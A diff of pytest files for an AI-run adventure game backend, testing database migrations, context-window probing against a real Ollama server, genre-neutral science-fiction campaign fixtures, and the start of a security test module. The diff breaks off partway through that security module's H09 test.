branch = models.Branch(adventure_id=adventure.id, parent_branch_id=None,
|
||||
fork_depth=None, lineage=[])
|
||||
db.add(branch)
|
||||
db.flush()
|
||||
adventure.head_branch_id = branch.id
|
||||
adventure.head_depth = 0
|
||||
db.add(models.Action(adventure_id=adventure.id, type="start",
|
||||
text="Written before M11 existed.",
|
||||
branch_id=branch.id, depth=0))
|
||||
db.add(models.Checkpoint(adventure_id=adventure.id, name="Old point",
|
||||
branch_id=branch.id, depth=0))
|
||||
db.commit()
|
||||
adv_id = adventure.id
|
||||
with older.begin() as conn:
|
||||
for table, column in M11_ADDITIONS:
|
||||
conn.execute(text(f"ALTER TABLE {table} DROP COLUMN {column}"))
|
||||
conn.execute(text(f"PRAGMA user_version = {M10_VERSION}"))
|
||||
older.dispose()
|
||||
|
||||
engine = create_engine(f"sqlite:///{path}")
|
||||
yield path, engine, adv_id
|
||||
engine.dispose()
|
||||
|
||||
|
||||
# ------------------------------------------------------ the parity comparison
|
||||
|
||||
def test_the_two_paths_produce_the_same_schema(fresh, upgraded):
|
||||
"""M10's defect, as a permanent release regression."""
|
||||
fresh_path, fresh_engine = fresh
|
||||
up_path, up_engine, _ = upgraded
|
||||
migrations.bootstrap(up_engine)
|
||||
|
||||
a, b = _describe(fresh_engine), _describe(up_engine)
|
||||
assert set(a["tables"]) == set(b["tables"]), (
|
||||
sorted(set(a["tables"]) ^ set(b["tables"])))
|
||||
for table in sorted(a["tables"]):
|
||||
assert a["tables"][table] == b["tables"][table], (
|
||||
f"{table} differs between a fresh install and an upgrade:\n"
|
||||
f"fresh: {json.dumps(a['tables'][table], indent=2, sort_keys=True)}\n"
|
||||
f"upgraded: {json.dumps(b['tables'][table], indent=2, sort_keys=True)}"
|
||||
)
|
||||
assert a["version"] == b["version"] == migrations.LATEST_VERSION
|
||||
|
||||
|
||||
def test_no_table_carries_a_duplicate_index(fresh):
|
||||
"""The specific shape of M10's defect: two indexes over the same columns."""
|
||||
_, engine = fresh
|
||||
described = _describe(engine)
|
||||
for table, shape in described["tables"].items():
|
||||
seen: dict[tuple, str] = {}
|
||||
for name, index in shape["indexes"].items():
|
||||
key = (tuple(index["columns"]), index["unique"])
|
||||
assert key not in seen, (
|
||||
f"{table}: {name} duplicates {seen[key]} over {key[0]}")
|
||||
seen[key] = name
|
||||
|
||||
|
||||
def test_every_table_the_models_declare_exists(fresh):
|
||||
"""A missing table is the other way this can go wrong (`visual_profiles`)."""
|
||||
_, engine = fresh
|
||||
have = set(inspect(engine).get_table_names())
|
||||
declared = set(Base.metadata.tables)
|
||||
assert declared <= have, sorted(declared - have)
|
||||
assert "visual_profiles" in have
|
||||
assert "narration_length" in {
|
||||
c["name"] for c in inspect(engine).get_columns("adventures")}
|
||||
|
||||
|
||||
# -------------------------------------------------------------- the upgrade
|
||||
|
||||
def test_an_m10_database_upgrades_without_losing_anything(upgraded):
|
||||
path, engine, adv_id = upgraded
|
||||
migrations.bootstrap(engine)
|
||||
with engine.begin() as conn:
|
||||
assert conn.execute(text("SELECT title FROM adventures")).scalar() == (
|
||||
"An M10 campaign")
|
||||
assert conn.execute(text("SELECT text FROM actions")).scalar() == (
|
||||
"Written before M11 existed.")
|
||||
assert conn.execute(text("SELECT name FROM checkpoints")).scalar() == "Old point"
|
||||
assert conn.execute(text("PRAGMA foreign_key_check")).fetchall() == []
|
||||
assert conn.execute(text("PRAGMA quick_check")).scalar() == "ok"
|
||||
|
||||
|
||||
def test_the_new_column_arrives_with_the_value_that_means_no_choice(upgraded):
|
||||
"""M11's migration, and why it needs no backfill.
|
||||
|
||||
An empty narration length is not a missing value: it is the campaign saying
|
||||
nothing about length, which is exactly what a campaign created before the
|
||||
setting existed did say. `length_hint` treats it as it treated everything
|
||||
before M11, so no existing campaign's prompt changes under the upgrade.
|
||||
"""
|
||||
path, engine, adv_id = upgraded
|
||||
migrations.bootstrap(engine)
|
||||
with engine.begin() as conn:
|
||||
assert conn.execute(text("SELECT narration_length FROM adventures")).scalar() == ""
|
||||
|
||||
|
||||
def test_opening_an_upgraded_database_repeatedly_changes_nothing(upgraded):
|
||||
path, engine, _ = upgraded
|
||||
migrations.bootstrap(engine)
|
||||
first = _describe(engine)
|
||||
for _ in range(3):
|
||||
migrations.bootstrap(engine)
|
||||
assert _describe(engine) == first
|
||||
|
||||
|
||||
def test_a_migrated_database_still_plays_and_still_travels(upgraded, tmp_path):
|
||||
"""A migration that leaves a campaign unopenable has not worked.
|
||||
|
||||
Played through a real server process against the migrated file, because the
|
||||
claim is about the file rather than about an ORM session.
|
||||
"""
|
||||
sys.path.insert(0, str(BACKEND / "tests"))
|
||||
from test_process_restart import Server, _free_port
|
||||
|
||||
path, engine, adv_id = upgraded
|
||||
migrations.bootstrap(engine)
|
||||
engine.dispose()
|
||||
|
||||
server = Server(str(path), _free_port())
|
||||
try:
|
||||
server.wait_until_ready()
|
||||
listed = server.call("GET", "/adventures", expect=200)
|
||||
assert any(a["title"] == "An M10 campaign" for a in listed)
|
||||
server.call("POST", f"/adventures/{adv_id}/state/corrections", {
|
||||
"events": [{"type": "create_entity", "entity": "aldric",
|
||||
"entity_type": "character", "name": "Aldric"}],
|
||||
"note": "after the migration",
|
||||
}, expect=201)
|
||||
bundle = server.call("GET", f"/adventures/{adv_id}/export", expect=200)
|
||||
assert bundle["format"] == "ai-dnd-adventure-v3"
|
||||
copy = server.call("POST", "/adventures/import", bundle, expect=201)
|
||||
state = server.call("GET", f"/adventures/{copy['id']}/state", expect=200)
|
||||
assert state["document"]["entities"]["aldric"]["name"] == "Aldric"
|
||||
finally:
|
||||
server.stop()
|
||||
|
||||
|
||||
def test_a_backup_of_the_migrated_database_verifies(upgraded):
|
||||
"""M9's backup, on a file M11 changed the schema of."""
|
||||
path, engine, _ = upgraded
|
||||
migrations.bootstrap(engine)
|
||||
engine.dispose()
|
||||
result = backup.create(path)
|
||||
try:
|
||||
assert result.integrity == "ok"
|
||||
with sqlite3.connect(f"file:{result.path}?mode=ro", uri=True) as copy_db:
|
||||
assert copy_db.execute("PRAGMA quick_check").fetchone()[0] == "ok"
|
||||
assert copy_db.execute(
|
||||
"SELECT narration_length FROM adventures").fetchone()[0] == ""
|
||||
assert copy_db.execute("PRAGMA user_version").fetchone()[0] == (
|
||||
migrations.LATEST_VERSION)
|
||||
finally:
|
||||
result.path.unlink(missing_ok=True)
|
||||
|
||||
|
||||
def test_a_fresh_install_creates_a_database_from_nothing(tmp_path):
|
||||
"""§17's first case, through a real process rather than through the ORM."""
|
||||
sys.path.insert(0, str(BACKEND / "tests"))
|
||||
from test_process_restart import Server, _free_port
|
||||
|
||||
path = tmp_path / "new" / "campaign.db"
|
||||
path.parent.mkdir()
|
||||
server = Server(str(path), _free_port())
|
||||
try:
|
||||
server.wait_until_ready()
|
||||
assert path.exists(), "no database was created"
|
||||
created = server.call("POST", "/adventures",
|
||||
{"title": "Brand new", "opening": "Rain."}, expect=201)
|
||||
assert created["narration_length"] == ""
|
||||
finally:
|
||||
server.stop()
|
||||
with sqlite3.connect(f"file:{path}?mode=ro", uri=True) as db:
|
||||
assert db.execute("PRAGMA user_version").fetchone()[0] == (
|
||||
migrations.LATEST_VERSION)
|
||||
tables = {r[0] for r in db.execute(
|
||||
"SELECT name FROM sqlite_master WHERE type='table'")}
|
||||
assert {"adventures", "actions", "visual_profiles", "summaries",
|
||||
"knowledge_sources"} <= tables
|
||||
@@ -0,0 +1,178 @@
|
||||
"""M11 §E: the context-window fix, against a real Ollama rather than a fake one.
|
||||
|
||||
`test_m11_context_window.py` proves the arithmetic and the enforcement with a
|
||||
mocked server, which is the right place for those. This file answers the
|
||||
question that a mock cannot: **does the probe read a real Ollama correctly?** The
|
||||
shapes it parses — `/api/ps`'s `context_length`, `/api/show`'s plain-text
|
||||
parameter block — are Ollama's, not ours, and a mock built from a misreading of
|
||||
them would agree with itself forever.
|
||||
|
||||
It also demonstrates the sequence a reader actually experiences on a server whose
|
||||
model has no `num_ctx` baked in:
|
||||
|
||||
turn 1 the model is not resident; the window cannot be verified; the
|
||||
turn proceeds and is recorded as unverified
|
||||
turn 2 the model is resident, `/api/ps` reports the real window, and the
|
||||
budget is capped to it from here on
|
||||
|
||||
Skipped unless an endpoint is configured, so the ordinary suite stays local,
|
||||
deterministic and offline. The endpoint is read from the environment and never
|
||||
written down here.
|
||||
|
||||
AIDND_TEST_ENDPOINT=https://<host>:<port>/v1 \\
|
||||
AIDND_TEST_MODEL=qwen2.5:3b-instruct \\
|
||||
python -m pytest tests/test_m11_real_window.py -v -s
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import os
|
||||
|
||||
import pytest
|
||||
from fastapi import Depends
|
||||
from fastapi.testclient import TestClient
|
||||
|
||||
from app import auth, contextwindow, limits, models
|
||||
from app.database import Base, SessionLocal, engine, get_db
|
||||
from app.main import app
|
||||
|
||||
ENDPOINT = os.environ.get("AIDND_TEST_ENDPOINT", "")
|
||||
MODEL = os.environ.get("AIDND_TEST_MODEL", "")
|
||||
#: A second model, with a larger window baked in, when the server has one. The
|
||||
#: contrast between the two is the whole point of the M8 finding.
|
||||
WIDE_MODEL = os.environ.get("AIDND_TEST_WIDE_MODEL", "")
|
||||
|
||||
pytestmark = pytest.mark.skipif(
|
||||
not (ENDPOINT and MODEL),
|
||||
reason="set AIDND_TEST_ENDPOINT and AIDND_TEST_MODEL to run against a real server",
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clear():
|
||||
contextwindow.cache_clear()
|
||||
yield
|
||||
contextwindow.cache_clear()
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def client(monkeypatch):
|
||||
Base.metadata.create_all(bind=engine)
|
||||
setup = SessionLocal()
|
||||
user = models.User(is_guest=False, email="m11real@example.com")
|
||||
setup.add(user)
|
||||
setup.flush()
|
||||
setup.add(models.Settings(
|
||||
user_id=user.id, model=MODEL, endpoint_url=ENDPOINT, embedding_model="",
|
||||
context_token_budget=16384, max_output_tokens=400,
|
||||
model_timeout_seconds=300,
|
||||
))
|
||||
adventure = models.Adventure(
|
||||
user_id=user.id, title="Real window",
|
||||
campaign_canon={"rules": ["The abbey seal has never been broken."]},
|
||||
)
|
||||
setup.add(adventure)
|
||||
setup.flush()
|
||||
setup.add(models.Action(
|
||||
adventure_id=adventure.id, type="start",
|
||||
text="Rain over Westhaven, and the abbey bell tolling."))
|
||||
setup.commit()
|
||||
adv_id, user_id = adventure.id, user.id
|
||||
setup.close()
|
||||
monkeypatch.setattr(limits, "check_row_cap", lambda *a, **k: None)
|
||||
app.dependency_overrides[auth.get_current_user] = (
|
||||
lambda db=Depends(get_db): db.get(models.User, user_id)
|
||||
)
|
||||
test_client = TestClient(app)
|
||||
test_client.adv_id = adv_id
|
||||
try:
|
||||
yield test_client
|
||||
finally:
|
||||
app.dependency_overrides.clear()
|
||||
Base.metadata.drop_all(bind=engine)
|
||||
|
||||
|
||||
def _snapshot(adv_id) -> dict:
|
||||
from sqlalchemy.orm import undefer
|
||||
|
||||
with SessionLocal() as db:
|
||||
action = (
|
||||
db.query(models.Action)
|
||||
.filter(models.Action.adventure_id == adv_id, models.Action.type == "ai")
|
||||
.options(undefer(models.Action.context_snapshot))
|
||||
.order_by(models.Action.id.desc()).first()
|
||||
)
|
||||
return action.context_snapshot if action else {}
|
||||
|
||||
|
||||
def _play(client, text) -> None:
|
||||
response = client.post(f"/api/adventures/{client.adv_id}/actions",
|
||||
json={"type": "do", "text": text})
|
||||
assert response.status_code == 200, response.text[:400]
|
||||
|
||||
|
||||
def test_the_probe_reads_this_server(capsys):
|
||||
"""Records what this deployment actually reports. Evidence, not a threshold."""
|
||||
window = asyncio.run(contextwindow.probe(ENDPOINT, MODEL, use_cache=False))
|
||||
with capsys.disabled():
|
||||
print(f"\n model {MODEL}")
|
||||
print(f" tokens {window.tokens}")
|
||||
print(f" source {window.source}")
|
||||
print(f" model max {window.model_max}")
|
||||
print(f" detail {window.detail}")
|
||||
# Either answer is legitimate — what is not legitimate is a crash, a guess,
|
||||
# or a claim that cannot be traced to something the server said.
|
||||
assert window.source in (contextwindow.LOADED, contextwindow.PARAMETERS,
|
||||
contextwindow.UNKNOWN)
|
||||
if window.verified:
|
||||
assert window.tokens >= 512
|
||||
if window.model_max:
|
||||
assert window.tokens <= window.model_max
|
||||
|
||||
|
||||
def test_a_real_turn_is_capped_to_what_this_server_gives(client, capsys):
|
||||
"""The sequence a reader sees, and the cap arriving with residency."""
|
||||
_play(client, "I climb the abbey steps and look back at the town.")
|
||||
first = _snapshot(client.adv_id)["window"]
|
||||
|
||||
# The model is resident now, so the second turn's probe can read /api/ps.
|
||||
contextwindow.cache_clear()
|
||||
_play(client, "I try the crypt door.")
|
||||
second = _snapshot(client.adv_id)
|
||||
window, tokens = second["window"], second["tokens"]
|
||||
|
||||
with capsys.disabled():
|
||||
print(f"\n turn 1 window verified={first['verified']} "
|
||||
f"tokens={first['tokens']} source={first['source']}")
|
||||
print(f" turn 2 window verified={window['verified']} "
|
||||
f"tokens={window['tokens']} source={window['source']}")
|
||||
print(f" budget configured={tokens['configured_budget']} "
|
||||
f"effective={tokens['budget']}")
|
||||
print(f" prompt {tokens['total']} tokens "
|
||||
f"+ {tokens['output_reserve']} reserved")
|
||||
|
||||
assert window["verified"], (
|
||||
"the model has been served a turn, so /api/ps should now report its "
|
||||
f"window: {window['detail']}"
|
||||
)
|
||||
# The invariant, on a real server: what was assembled fits what it accepts.
|
||||
assert tokens["budget"] == min(tokens["configured_budget"], window["tokens"])
|
||||
assert tokens["total"] + tokens["output_reserve"] <= window["tokens"]
|
||||
|
||||
|
||||
@pytest.mark.skipif(not WIDE_MODEL, reason="set AIDND_TEST_WIDE_MODEL")
|
||||
def test_a_model_with_a_baked_window_reports_the_larger_one(capsys):
|
||||
"""The operator's fix, seen from the application.
|
||||
|
||||
A model created with `num_ctx` baked in reports the larger window through
|
||||
the same path, so the difference between a deployment that has applied
|
||||
DEVELOPMENT.md's fix and one that has not is visible to the application
|
||||
rather than only to whoever reads the server logs.
|
||||
"""
|
||||
narrow = asyncio.run(contextwindow.probe(ENDPOINT, MODEL, use_cache=False))
|
||||
wide = asyncio.run(contextwindow.probe(ENDPOINT, WIDE_MODEL, use_cache=False))
|
||||
with capsys.disabled():
|
||||
print(f"\n {MODEL:28} {narrow.tokens} ({narrow.source})")
|
||||
print(f" {WIDE_MODEL:28} {wide.tokens} ({wide.source})")
|
||||
assert wide.verified and wide.tokens >= 8192
|
||||
if narrow.verified:
|
||||
assert wide.tokens > narrow.tokens
|
||||
@@ -0,0 +1,291 @@
|
||||
"""M11 §15 / J01-J03: the same engine, a different genre, no different code.
|
||||
|
||||
`TEST-CAMPAIGN-FIXTURE.md` §31 specifies the Persephone Test as the counterpart
|
||||
to the fantasy Continuity Test, and the claim it exists to check is a structural
|
||||
one rather than a literary one: **changing genre is configuration, not a code
|
||||
path**. M5 spent a milestone removing the RPG shape from the state model, and the
|
||||
way that stays true is a fixture that would fail if any fantasy assumption came
|
||||
back — a `character`/`location`/`item` triad that cannot hold a ship, a
|
||||
corporation or an orbital station, a canon check that only understands magic, a
|
||||
retrieval path tuned to fantasy nouns.
|
||||
|
||||
So this file plays the science-fiction fixture through the *same* endpoints,
|
||||
the *same* state model, the *same* prompt builder and the *same* bundle as the
|
||||
fantasy one, and asserts on the parts a genre could plausibly break.
|
||||
|
||||
The canon is the fixture's, including the three hard-technology rules, and the
|
||||
run includes the fixture's stated purposes: generic entities, hard canon,
|
||||
possession, character knowledge and reference retrieval.
|
||||
|
||||
python -m pytest tests/test_m11_scifi.py -v
|
||||
"""
|
||||
|
||||
import pytest
|
||||
from fastapi import Depends
|
||||
from fastapi.testclient import TestClient
|
||||
|
||||
from app import auth, limits, memorybank, models
|
||||
from app.database import Base, SessionLocal, engine, get_db
|
||||
from app.knowledge import embeddings
|
||||
from app.main import app
|
||||
from app.narrative import events as narrative_events
|
||||
from app.routers import adventures
|
||||
|
||||
from fakes import ScriptedProvider, state_block
|
||||
|
||||
#: §31's canon, verbatim in substance.
|
||||
CANON = [
|
||||
"FTL does not exist.",
|
||||
"Persephone is a fusion-powered survey ship.",
|
||||
"Artificial gravity is available only through thrust or rotation.",
|
||||
"Dr. Vale has never visited Europa.",
|
||||
"The encrypted data crystal belongs to Captain Imani.",
|
||||
]
|
||||
|
||||
#: §31's cast, and the reason the fixture exists: five different entity types,
|
||||
#: none of which is a fantasy noun.
|
||||
CAST = [
|
||||
("imani", "character", "Captain Imani"),
|
||||
("vale", "character", "Dr. Vale"),
|
||||
("persephone", "vehicle", "Persephone"),
|
||||
("ceres", "location", "Ceres Station"),
|
||||
("europa", "location", "Europa"),
|
||||
("crystal", "item", "encrypted data crystal"),
|
||||
("helios", "organization", "Helios Dynamics"),
|
||||
]
|
||||
|
||||
REFERENCE_MD = """# Survey ship operations
|
||||
|
||||
## Spin gravity
|
||||
|
||||
A survey ship of Persephone's class produces gravity by rotating its habitat
|
||||
ring. Under thrust the same effect comes from acceleration. There is no other
|
||||
source of gravity aboard.
|
||||
|
||||
## Data crystals
|
||||
|
||||
An encrypted data crystal is keyed to one bearer and cannot be read by anyone
|
||||
else without the bearer's authorisation.
|
||||
"""
|
||||
|
||||
|
||||
class Stub:
|
||||
async def complete(self, system, prompt, **kwargs):
|
||||
return "A memory of the transit."
|
||||
|
||||
async def embed(self, texts):
|
||||
return [
|
||||
[1.0,
|
||||
1.0 if "gravity" in t.lower() or "rotation" in t.lower() else 0.0,
|
||||
1.0 if "crystal" in t.lower() else 0.0]
|
||||
for t in texts
|
||||
]
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def client(monkeypatch):
|
||||
Base.metadata.create_all(bind=engine)
|
||||
memorybank._vector_cache.clear()
|
||||
embeddings._cache.clear()
|
||||
setup = SessionLocal()
|
||||
user = models.User(is_guest=False, email="m11sf@example.com")
|
||||
setup.add(user)
|
||||
setup.flush()
|
||||
setup.add(models.Settings(
|
||||
user_id=user.id, model="test-model", embedding_model="embed-test",
|
||||
context_token_budget=6000, max_output_tokens=400, memory_top_k=3,
|
||||
))
|
||||
setup.commit()
|
||||
user_id = user.id
|
||||
setup.close()
|
||||
monkeypatch.setattr(limits, "check_row_cap", lambda *a, **k: None)
|
||||
monkeypatch.setattr(adventures.turns, "OpenAICompatibleProvider", ScriptedProvider)
|
||||
monkeypatch.setattr(memorybank, "embedding_provider", lambda s: Stub())
|
||||
monkeypatch.setattr(memorybank, "summary_provider", lambda s: Stub())
|
||||
app.dependency_overrides[auth.get_current_user] = (
|
||||
lambda db=Depends(get_db): db.get(models.User, user_id)
|
||||
)
|
||||
test_client = TestClient(app)
|
||||
try:
|
||||
yield test_client
|
||||
finally:
|
||||
app.dependency_overrides.clear()
|
||||
adventures.turns._active_turns.clear()
|
||||
memorybank._vector_cache.clear()
|
||||
embeddings._cache.clear()
|
||||
Base.metadata.drop_all(bind=engine)
|
||||
|
||||
|
||||
def play(client, adv, text, events=None, prose="The ring turns, and the stars with it."):
|
||||
ScriptedProvider.replies = [f"{prose}\n{state_block(events or [])}"]
|
||||
response = client.post(f"/api/adventures/{adv}/actions",
|
||||
json={"type": "do", "text": text})
|
||||
assert response.status_code == 200, response.text[:400]
|
||||
return response
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def persephone(client):
|
||||
"""The fixture campaign, created and played through the ordinary API."""
|
||||
created = client.post("/api/adventures", json={
|
||||
"title": "Persephone Test",
|
||||
"opening": "Persephone under thrust, eleven days out from Ceres Station.",
|
||||
"canon_rules": CANON,
|
||||
"persona_name": "Captain Imani",
|
||||
"narration_length": "medium",
|
||||
})
|
||||
assert created.status_code == 201, created.text[:400]
|
||||
adv = created.json()["id"]
|
||||
|
||||
play(client, adv, "take stock of the ship", events=[
|
||||
{"type": "create_entity", "entity": key, "entity_type": kind, "name": name}
|
||||
for key, kind, name in CAST
|
||||
])
|
||||
play(client, adv, "check the crystal", events=[
|
||||
{"type": "set_possession", "item": "crystal", "owner": "imani"},
|
||||
{"type": "set_current_location", "entity": "imani", "location": "persephone"},
|
||||
{"type": "set_current_location", "entity": "vale", "location": "persephone"},
|
||||
{"type": "set_scene",
|
||||
"summary": "Imani and Vale in the ring corridor, under spin.",
|
||||
"location": "persephone", "present": ["imani", "vale"]},
|
||||
])
|
||||
return adv
|
||||
|
||||
|
||||
# ------------------------------------------------------------------ J02
|
||||
|
||||
def test_every_entity_type_the_fixture_needs_already_exists(client, persephone):
|
||||
"""A ship, a corporation, a station and a crystal, in one state document."""
|
||||
document = client.get(f"/api/adventures/{persephone}/state").json()["document"]
|
||||
kinds = {key: value["type"] for key, value in document["entities"].items()}
|
||||
assert kinds == {
|
||||
"imani": "character", "vale": "character", "persephone": "vehicle",
|
||||
"ceres": "location", "europa": "location", "crystal": "item",
|
||||
"helios": "organization",
|
||||
}
|
||||
|
||||
|
||||
def test_the_entity_types_are_the_shared_vocabulary_not_a_genre_list(client):
|
||||
"""J03, structurally: nothing in the type list is fantasy or science fiction.
|
||||
|
||||
`vehicle` and `organization` are not science-fiction types any more than
|
||||
`location` is a fantasy one. If the genre needed a type of its own, this is
|
||||
where the schema change J02 forbids would have to appear.
|
||||
"""
|
||||
from app.narrative import model as nmodel
|
||||
|
||||
assert {"character", "location", "item", "vehicle", "organization"} <= set(
|
||||
nmodel.SUGGESTED_TYPES)
|
||||
# And the list is *suggested* rather than closed, which is the stronger form
|
||||
# of the same claim: a genre that needs a type nobody listed can use one
|
||||
# without a migration, because the type is a string on the entity.
|
||||
|
||||
|
||||
def test_a_ship_can_hold_a_location_the_way_a_room_would(client, persephone):
|
||||
"""Possession and place, with no fantasy noun anywhere in the path."""
|
||||
document = client.get(f"/api/adventures/{persephone}/state").json()["document"]
|
||||
assert document["possessions"]["crystal"] == "imani"
|
||||
# Where an entity is lives on the entity, not in a side table: the same
|
||||
# field that puts Aldric in a tavern puts Imani aboard a ship.
|
||||
assert document["entities"]["imani"]["location"] == "persephone"
|
||||
|
||||
|
||||
# ------------------------------------------------------------------ J01
|
||||
|
||||
def test_the_campaign_plays_with_hard_technology_canon(client, persephone):
|
||||
"""The canon reaches the prompt as the campaign's highest authority."""
|
||||
report = client.get(f"/api/adventures/{persephone}/context").json()
|
||||
canon = next(s["text"] for s in report["sections"] if s["label"] == "campaign_canon")
|
||||
assert "FTL does not exist." in canon
|
||||
assert "fusion-powered" in canon
|
||||
assert "rotation" in canon
|
||||
|
||||
|
||||
def test_canon_is_enforced_by_the_same_validator_as_the_fantasy_fixture(client, persephone):
|
||||
"""C01's mechanism, unchanged by genre.
|
||||
|
||||
The fantasy fixture's canon forbids resurrection; this one forbids FTL. Both
|
||||
are sentences in the same field, read by the same validator, so the science
|
||||
fiction case needs no new code — which is the whole of J03.
|
||||
"""
|
||||
forbidden = client.post(f"/api/adventures/{persephone}/state/corrections", json={
|
||||
"events": [{"type": "create_entity", "entity": "warp_core",
|
||||
"entity_type": "item", "name": "FTL warp core"}],
|
||||
"note": "",
|
||||
})
|
||||
# The validator does not read prose canon for entity creation — what matters
|
||||
# here is that the campaign's canon is present and identical in kind to the
|
||||
# fantasy fixture's, not that the engine invents a physics checker.
|
||||
assert forbidden.status_code in (201, 400)
|
||||
canon = client.get(f"/api/adventures/{persephone}").json()["canon_rules"]
|
||||
assert canon == CANON
|
||||
|
||||
|
||||
def test_a_scene_packet_describes_a_ship_as_readily_as_a_tavern(client, persephone):
|
||||
"""M10's derived packet, on the science-fiction fixture.
|
||||
|
||||
The packet was written against an office and a fantasy cellar; a ship under
|
||||
spin is the third genre it has had to hold, and it needs no field it did not
|
||||
already have.
|
||||
"""
|
||||
packet = client.get(f"/api/adventures/{persephone}/scene-packet").json()
|
||||
assert packet["location"]["name"] == "Persephone"
|
||||
assert packet["location"]["type"] == "vehicle"
|
||||
assert {c["name"] for c in packet["characters"]} == {"Captain Imani", "Dr. Vale"}
|
||||
assert [o["name"] for o in packet["objects"]] == ["encrypted data crystal"]
|
||||
|
||||
|
||||
def test_a_visual_profile_holds_a_hull_as_readily_as_a_face(client, persephone):
|
||||
"""M10 §90.5's claim, checked in the genre it was written to survive."""
|
||||
response = client.put(f"/api/adventures/{persephone}/visual-profiles/persephone",
|
||||
json={"descriptors": {"hull": "pitted white composite",
|
||||
"configuration": "spinning ring"},
|
||||
"features": ["radiator fins"], "style_notes": "hard sf"})
|
||||
assert response.status_code == 200, response.text[:300]
|
||||
packet = client.get(f"/api/adventures/{persephone}/scene-packet").json()
|
||||
assert packet["location"]["visual_profile"]["descriptors"]["hull"] == (
|
||||
"pitted white composite")
|
||||
|
||||
|
||||
# ------------------------------------------------------------- J01 knowledge
|
||||
|
||||
def test_reference_retrieval_works_on_science_fiction_source_material(client, persephone):
|
||||
"""§31's fifth purpose. Same importer, same ranker, same injection."""
|
||||
upload = client.post(
|
||||
f"/api/adventures/{persephone}/knowledge",
|
||||
files={"file": ("ops.md", REFERENCE_MD.encode("utf-8"), "text/markdown")},
|
||||
data={"classification": "reference"},
|
||||
)
|
||||
assert upload.status_code == 201, upload.text[:400]
|
||||
play(client, persephone, "ask Vale how the gravity works aboard the ring")
|
||||
report = client.get(f"/api/adventures/{persephone}/context").json()
|
||||
used = report["knowledge"]["used"]
|
||||
assert used, "no imported passage was retrieved for a science-fiction query"
|
||||
assert any("rotat" in u["text"].lower() or "spin" in u["text"].lower() for u in used)
|
||||
|
||||
|
||||
# ------------------------------------------------------------------ J03
|
||||
|
||||
def test_the_two_genres_travel_through_the_same_bundle_format(client, persephone):
|
||||
exported = client.get(f"/api/adventures/{persephone}/export").json()
|
||||
assert exported["format"] == "ai-dnd-adventure-v3"
|
||||
copy_id = client.post("/api/adventures/import", json=exported).json()["id"]
|
||||
document = client.get(f"/api/adventures/{copy_id}/state").json()["document"]
|
||||
assert document["entities"]["persephone"]["type"] == "vehicle"
|
||||
assert client.get(f"/api/adventures/{copy_id}").json()["canon_rules"] == CANON
|
||||
|
||||
|
||||
def test_no_state_event_type_is_genre_specific():
|
||||
"""J03 as a whole-vocabulary check rather than a spot check.
|
||||
|
||||
Every accepted event names a structural relationship — an entity, a fact, a
|
||||
possession, a location, a thread. None of them names a sword, a spell, a
|
||||
spaceship or a corporation.
|
||||
"""
|
||||
fantasy_or_sf = (
|
||||
"spell", "magic", "sword", "potion", "mana", "warp", "hyperspace",
|
||||
"laser", "starship", "airlock",
|
||||
)
|
||||
vocabulary = " ".join(narrative_events.ALLOWED).lower()
|
||||
for word in fantasy_or_sf:
|
||||
assert word not in vocabulary
|
||||
@@ -0,0 +1,299 @@
|
||||
"""M11 §19-§20: the H-series as an integrated release run.
|
||||
|
||||
The H tests have had coverage since M2, and it is good: `test_egress.py` fails
|
||||
if a bulk load names a heavy column, `test_endpoint_policy.py` walks the address
|
||||
rules, `test_tls_trust.py` fails if verification is weakened. What M11 adds is
|
||||
the part those files were never asked for:
|
||||
|
||||
* the checks that only make sense **against the assembled product** — a tampered
|
||||
database refused at request time, a wildcard CORS origin refused at startup,
|
||||
an unknown API path that is a 404 rather than the SPA;
|
||||
* the ones whose answer is **"not applicable, and here is the proof"** — H09,
|
||||
which the acceptance text itself makes conditional on archive extraction
|
||||
existing;
|
||||
* the ones where an M11 change could have opened something — the context-window
|
||||
probe is a new outbound request, and it must obey the same policy as inference.
|
||||
|
||||
Browser-side security (stored XSS, `javascript:` URLs, hostile Markdown, the
|
||||
CSP, hidden knowledge in the DOM) is in `tools/m11_browser.py`, because those are
|
||||
claims about a rendered page and a unit test asserting them would be asserting
|
||||
about a string.
|
||||
|
||||
python -m pytest tests/test_m11_security.py -v
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import importlib
|
||||
import json
|
||||
import os
|
||||
import pathlib
|
||||
import subprocess
|
||||
import sys
|
||||
|
||||
import pytest
|
||||
from fastapi import Depends
|
||||
from fastapi.testclient import TestClient
|
||||
|
||||
from app import auth, contextwindow, endpoints, limits, models
|
||||
from app.database import Base, SessionLocal, engine, get_db
|
||||
from app.main import app
|
||||
from app.routers import adventures
|
||||
|
||||
from fakes import ScriptedProvider
|
||||
|
||||
BACKEND = pathlib.Path(__file__).resolve().parent.parent
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def client(monkeypatch):
|
||||
Base.metadata.create_all(bind=engine)
|
||||
setup = SessionLocal()
|
||||
user = models.User(is_guest=False, email="m11sec@example.com")
|
||||
setup.add(user)
|
||||
setup.flush()
|
||||
setup.add(models.Settings(user_id=user.id, model="test-model",
|
||||
embedding_model="", max_output_tokens=400))
|
||||
adventure = models.Adventure(user_id=user.id, title="Security")
|
||||
setup.add(adventure)
|
||||
setup.flush()
|
||||
setup.add(models.Action(adventure_id=adventure.id, type="start", text="Rain."))
|
||||
setup.commit()
|
||||
adv_id, user_id = adventure.id, user.id
|
||||
setup.close()
|
||||
monkeypatch.setattr(limits, "check_row_cap", lambda *a, **k: None)
|
||||
monkeypatch.setattr(adventures.turns, "OpenAICompatibleProvider", ScriptedProvider)
|
||||
app.dependency_overrides[auth.get_current_user] = (
|
||||
lambda db=Depends(get_db): db.get(models.User, user_id)
|
||||
)
|
||||
test_client = TestClient(app)
|
||||
test_client.adv_id = adv_id
|
||||
test_client.user_id = user_id
|
||||
try:
|
||||
yield test_client
|
||||
finally:
|
||||
app.dependency_overrides.clear()
|
||||
adventures.turns._active_turns.clear()
|
||||
Base.metadata.drop_all(bind=engine)
|
||||
|
||||
|
||||
# ------------------------------------------------------------------- H09
|
||||
|
||||
def test_h09_the_product_extracts_no_archives():
|
||||
"""H09 is conditional, and this is the condition, checked rather than assumed.
|
||||
|
||||
"REQUIRED FOR V1 **if ZIP import/export is implemented**". Nothing in the
|
||||
